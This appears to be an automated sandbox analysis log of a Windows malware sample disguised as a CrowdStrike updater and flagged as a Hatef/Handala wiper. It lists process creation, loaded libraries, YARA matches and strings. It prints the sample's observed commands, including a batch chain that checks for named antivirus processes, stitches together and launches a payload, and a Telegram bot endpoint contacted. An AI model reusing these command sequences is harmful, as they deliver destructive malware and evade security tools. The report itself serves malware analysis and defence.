        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
        Source: CrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Champion.pif, 0000000A.00000000.1733135442.0000000000EA9000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

        Operating System Destruction

        barindex
        Yara detected Hatef Wiper
        Source: Yara matchFile source: 15.2.RegAsm.exe.700000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7904, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sysJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile deleted: C:\Windows\appcompat\appraiser\AltDataJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_0040497C0_2_0040497C
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00406ED20_2_00406ED2
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004074BB0_2_004074BB
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeCode function: 15_2_00CF8D7815_2_00CF8D78
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeCode function: 15_2_00CF714815_2_00CF7148
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeCode function: 15_2_00CF713815_2_00CF7138
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: String function: 004062A3 appears 58 times
        Source: CrowdStrike.exeStatic PE information: invalid certificate
        Source: CrowdStrike.exe, 00000000.00000000.1686416868.00000000004F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCrowdStrike Updater.exe8 vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000003.1709951864.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000002.1711963746.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs CrowdStrike.exe
        Source: CrowdStrike.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: ListOpenedFileDrv_32.sys.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal96.troj.evad.winEXE@24/40@4/2
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
        Source: C:\Users\user\Desktop\CrowdStrike.exeFile created: C:\Users\user\AppData\Local\Temp\nsy4082.tmpJump to behavior
        Source: CrowdStrike.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\CrowdStrike.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: CrowdStrike.exeVirustotal: Detection: 20%
        Source: CrowdStrike.exeReversingLabs: Detection: 15%
        Source: C:\Users\user\Desktop\CrowdStrike.exeFile read: C:\Users\user\Desktop\CrowdStrike.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CrowdStrike.exe "C:\Users\user\Desktop\CrowdStrike.exe"
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\L
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\LJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\LJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: CrowdStrike.exeStatic file information: File size 6338272 > 1048576
        Source: CrowdStrike.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb` source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qyC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
